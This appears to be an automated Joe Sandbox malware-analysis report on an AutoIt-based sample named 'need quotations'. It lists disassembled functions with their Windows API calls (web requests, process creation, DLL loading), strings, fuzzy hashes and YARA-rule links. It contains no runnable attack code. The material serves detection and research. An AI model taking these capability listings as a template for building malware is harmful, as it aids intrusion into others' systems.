Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: b6ad380bcbbaefd4ca7623bfa3b277e173578f09c4161995bf5029f91684b997
Instruction ID: ffb84c7026e6e54197f42e096add6c0ce6196a003ece65e139fd89f483d5279d
Opcode Fuzzy Hash: b6ad380bcbbaefd4ca7623bfa3b277e173578f09c4161995bf5029f91684b997
Instruction Fuzzy Hash: F7F05E36142212ABD7152BA4FC9DDAA7729FF84301B180436F903910A1DB75A851DB51

Function 00241CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0025F4EA: std::exception::exception.LIBCMT ref: 0025F51E
Part of subcall function 0025F4EA: __CxxThrowException@8.LIBCMT ref: 0025F533

__swprintf.LIBCMT ref: 00241EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00241D49

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 10299bde36a9c48a7f299e49c899ae936aeea846c0ef989d3c7fd827a7063433
Instruction ID: 15727eb781c16498fb96a1c4ea8dcd4e9b06acee12492f61dd047d9ee25cac2e
Opcode Fuzzy Hash: 10299bde36a9c48a7f299e49c899ae936aeea846c0ef989d3c7fd827a7063433
Instruction Fuzzy Hash: 13917C712242029FC728EF24C895CAAB7F4EF95740F50491DF985972A1DB70EE68CB92

Function 0029AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0029B006
CharUpperBuffW.USER32(?,?), ref: 0029B115
VariantClear.OLEAUT32(?), ref: 0029B298

Part of subcall function 00289DC5: VariantInit.OLEAUT32(00000000), ref: 00289E05
Part of subcall function 00289DC5: VariantCopy.OLEAUT32(?,?), ref: 00289E0E
Part of subcall function 00289DC5: VariantClear.OLEAUT32(?), ref: 00289E1A

Strings

Incorrect Parameter format, xrefs: 0029B03E, 0029B20B
AUTOIT.ERROR, xrefs: 0029B11B

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: e6ca2bd7729a033a96d2f4e5630876e52fb1804e4c58172fd2ce2a646e63219d
Instruction ID: e8ac69ae0213dcb1dcaa916d7f2347c48f37d1aa129dfb5f075a0bd7966ffbb8
Opcode Fuzzy Hash: e6ca2bd7729a033a96d2f4e5630876e52fb1804e4c58172fd2ce2a646e63219d
Instruction Fuzzy Hash: D9918B30A283019FCB14DF24D58595BBBE4EF89704F14486EF89A8B362DB31ED55CB52

Function 00285347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0025C6F4: _wcscpy.LIBCMT ref: 0025C717

_memset.LIBCMT ref: 00285438
GetMenuItemInfoW.USER32(?), ref: 00285467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00285513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0028553D

Strings

0, xrefs: 00285430

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: de090ddf068bd036f3c254f0ef3eea65e20f1a70be72181c985b2b1eb8cf7384
Instruction ID: 1dcf0d9e4a469bd05954698efa3502a828ffe84cf07195902f06229c8a588b63
Opcode Fuzzy Hash: de090ddf068bd036f3c254f0ef3eea65e20f1a70be72181c985b2b1eb8cf7384
Instruction Fuzzy Hash: 4F5134791367229BD315BF28C8406ABBBE8EF85350F44062EF895D31D0D7B4CD648B52

Function 00280213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0028027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002802B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002802C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00280344

Strings

DllGetClassObject, xrefs: 002802B7

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: ee340183885494fde5420b49dadbcb4e77015029b3809eb43544ff460363b09e
Instruction ID: b02a701da9e0498f15be6b9c81923bbfcb3bf9251f0ed4ac1ec4e3064f4f3ec3
Opcode Fuzzy Hash: ee340183885494fde5420b49dadbcb4e77015029b3809eb43544ff460363b09e
Instruction Fuzzy Hash: 92419B75621204EFDB45EF54C8C5BAA7BB9EF44300B1480ADA9099F286D7F0DE58CBA0

Function 00285007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00285075
GetMenuItemInfoW.USER32 ref: 00285091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 002850D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00301708,00000000), ref: 00285120

Strings

0, xrefs: 0028506D

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 967282e79b8cb9b23c3d59e15d5daca61331004d917c220c50ef74504f1a04cc
Instruction ID: c402c1d0a239baff01f4f512c898c32a10a5bfb9da0eddefd923dd573806c8b0
Opcode Fuzzy Hash: 967282e79b8cb9b23c3d59e15d5daca61331004d917c220c50ef74504f1a04cc
Instruction Fuzzy Hash: B541E3782167129FD720EF24D888F2ABBE9AF89314F14461EF859972D1D730E814CF62

Function 002A0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 002A0587

Strings

stdcall, xrefs: 002A0609
none, xrefs: 002A0662
cdecl, xrefs: 002A05DE
winapi, xrefs: 002A05F8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 741bd3b53aa8fea06ba1a379f502ea97d8a9ba053a8c57b33ef01526da012847
Instruction ID: 6292eb8b8f43ca6d747ec1324076fbfed37bbd19f917445c5fdd5ea90418aaf5
Opcode Fuzzy Hash: 741bd3b53aa8fea06ba1a379f502ea97d8a9ba053a8c57b33ef01526da012847
Instruction Fuzzy Hash: 7931923092021AAFCF04EF54C9819EEF3B8FF55714B10462AE866A76D1DB71E925CF90

Function 0027B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0027B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0027B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 0027B8D1

Strings

ListBox, xrefs: 0027B84D
ComboBox, xrefs: 0027B815

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: fa6b3a2853c1c84715147dd4184237c077a0c3275daf517845c839c576dd2a35
Instruction ID: 66297c7d740eff27cac62f70fe9e3afdba1b5114ec2796b9e40b44545932fe8b
Opcode Fuzzy Hash: fa6b3a2853c1c84715147dd4184237c077a0c3275daf517845c839c576dd2a35
Instruction Fuzzy Hash: 14210771920108BFDB099F64D88AEFE777CDF06350F208129F565A32E0DB744D2A9B60

Function 002943E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00294401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00294427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00294457
InternetCloseHandle.WININET(00000000), ref: 0029449E

Part of subcall function 00295052: GetLastError.KERNEL32(?,?,002943CC,00000000,00000000,00000001), ref: 00295067

Strings

, xrefs: 00294450

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 482dbeb033bef48c5a983d35198faea32247672918d4b843b2bdc5d7217770f9
Instruction ID: 5e0ae94ccb9dccb1b1288b40bb908fa9f566bbadf521ac5306e44080d00e8fde
Opcode Fuzzy Hash: 482dbeb033bef48c5a983d35198faea32247672918d4b843b2bdc5d7217770f9
Instruction Fuzzy Hash: 0D2192B5610208BFEB11AF54DC85EBFB6FCFB48B44F10902AF109A2140EA749D169B71

Function 002A90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0025D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025D1BA
Part of subcall function 0025D17C: GetStockObject.GDI32(00000011), ref: 0025D1CE
Part of subcall function 0025D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0025D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002A915C
LoadLibraryW.KERNEL32(?), ref: 002A9163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002A9178
DestroyWindow.USER32(?), ref: 002A9180

Strings

SysAnimate32, xrefs: 002A9137

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 39d01e0146f0a092cc6b0bc0f93a5663de0dc5d692a997c74105f90c3ad7d971
Instruction ID: 8735c5b01f6ecfc4721954a0ffa43ceea0862a88de4ae01cbb85f5f2562cd20a
Opcode Fuzzy Hash: 39d01e0146f0a092cc6b0bc0f93a5663de0dc5d692a997c74105f90c3ad7d971
Instruction Fuzzy Hash: 7B219271620207BBEF104F65DC88FBB37ADEF56364F104619F95896190CB71DCA1AB60

Function 00289568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00289588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002895B9
GetStdHandle.KERNEL32(0000000C), ref: 002895CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00289605

Strings

nul, xrefs: 00289600

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 75a3d4822c1a370b5651dcd263c08f732c26b09c87196ef435adbb12bb3e3a89
Instruction ID: b033a8547150ebc9c39e9468d7982fe7cc798a419dd685b6f6c4b41314f2544a
Opcode Fuzzy Hash: 75a3d4822c1a370b5651dcd263c08f732c26b09c87196ef435adbb12bb3e3a89
Instruction Fuzzy Hash: 4521B5785112069FDB11AF25EC04EAE77F8AF44320F644A29FC61D72D0D774D9A0CB10

Function 00289634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00289653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00289683
GetStdHandle.KERNEL32(000000F6), ref: 00289694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002896CE

Strings

nul, xrefs: 002896C9

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: d43efee1768b93175249a39aa08cf6696226434ddb00440edfc7f1f05c87d812
Instruction ID: 5bd325228d53152f4aa9bc70e8287850c9ea18366ec6fb980d28e7fdc641d6ce
Opcode Fuzzy Hash: d43efee1768b93175249a39aa08cf6696226434ddb00440edfc7f1f05c87d812
Instruction Fuzzy Hash: 3621B8755212169FDB10AF699C04EA977ECAF45730F240A18FCA1D32D1F770D8A1CB10

Function 0028DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0028DB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0028DB5E
__swprintf.LIBCMT ref: 0028DB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,002DDC00), ref: 0028DBB5

Strings

%lu, xrefs: 0028DB71

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 3dd851eb59afe41cee447d1beac100128abdc314c5947e97b594261de82abddc
Instruction ID: 29b9dba8d66e67952010dbb2ed575d9cc58849b289c4c6dff6d3fb92146d6e89
Opcode Fuzzy Hash: 3dd851eb59afe41cee447d1beac100128abdc314c5947e97b594261de82abddc
Instruction Fuzzy Hash: 0C21C535A10108AFDB10EF64DD85DAEBBB8EF49704B104069F509D7291DB70EE51CF60

Function 0027C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0027C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0027C84A
Part of subcall function 0027C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0027C85D
Part of subcall function 0027C82D: GetCurrentThreadId.KERNEL32 ref: 0027C864
Part of subcall function 0027C82D: AttachThreadInput.USER32(00000000), ref: 0027C86B

GetFocus.USER32 ref: 0027CA05

Part of subcall function 0027C876: GetParent.USER32(?), ref: 0027C884

GetClassNameW.USER32(?,?,00000100), ref: 0027CA4E
EnumChildWindows.USER32(?,0027CAC4), ref: 0027CA76
__swprintf.LIBCMT ref: 0027CA90

Strings

%s%d, xrefs: 0027CA8A

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: e5487e91026b65b2eac77b024463329971048e11fa73f59edf063a2bd9a7d5a3
Instruction ID: c5f9047fa799b465c5e05f2eea44b0c8bec135270381f958fa2df32acadb7f60
Opcode Fuzzy Hash: e5487e91026b65b2eac77b024463329971048e11fa73f59edf063a2bd9a7d5a3
Instruction Fuzzy Hash: 071172715202096BCB11BFA09C89FAA376CAF45714F10807AFE0CAA186DB709966DF71

Function 00267A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00267AD8

Part of subcall function 00267CF4: __mtinitlocknum.LIBCMT ref: 00267D06
Part of subcall function 00267CF4: EnterCriticalSection.KERNEL32(00000000,?,00267ADD,0000000D), ref: 00267D1F

InterlockedIncrement.KERNEL32(?), ref: 00267AE5
__lock.LIBCMT ref: 00267AF9
___addlocaleref.LIBCMT ref: 00267B17

Strings

`,, xrefs: 00267AA3

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID: `,
API String ID: 1687444384-2092815365
Opcode ID: 4122be4c8a699fb9f22dd3ef4839ecdddd3382456a4b91001385debec3ac54ed
Instruction ID: e43e0930cf8746ad2ed708613b0fc98900f15c84b77e4601118cdb88fea3931c
Opcode Fuzzy Hash: 4122be4c8a699fb9f22dd3ef4839ecdddd3382456a4b91001385debec3ac54ed
Instruction Fuzzy Hash: D7016DB1414B00DFD720DF75E90974AB7F0EF54329F20890EA49A976A0CB74A690CF45

Function 002AE32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002AE33D
_memset.LIBCMT ref: 002AE34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00303D00,00303D44), ref: 002AE37B
CloseHandle.KERNEL32 ref: 002AE38D

Strings

D=0, xrefs: 002AE346

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: D=0
API String ID: 3277943733-3303244828
Opcode ID: 307b66a43b03e721f3a7f393098d5607ec1cfeaa55dac8280a0670acff994a39
Instruction ID: b5d3a783ae57b0781d1f0a0fd18bc7324151d89dff3fdb7fd08aab589fefcf36
Opcode Fuzzy Hash: 307b66a43b03e721f3a7f393098d5607ec1cfeaa55dac8280a0670acff994a39
Instruction Fuzzy Hash: 2FF0E2F0511300BFE3021B61AC69FBB7E5CDB04754F004022FE08D61A2D3719E108BA8

Function 002A1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002A19F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 002A1A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002A1B49
CloseHandle.KERNEL32(?), ref: 002A1BBF

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: c38ba657fc2165c186f40e36830e002962d005bb2c24d1bbf930694ddab08e48
Instruction ID: c8012a3308510bd1c1a979f92ee38c11fe7f6ac35d641b14bd7d1fbdcdccc153
Opcode Fuzzy Hash: c38ba657fc2165c186f40e36830e002962d005bb2c24d1bbf930694ddab08e48
Instruction Fuzzy Hash: 6D81A370610201ABDF109F64C886BAEBBE5AF09721F148459FD05AF3C2DBB4E965CF94

Function 00281C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

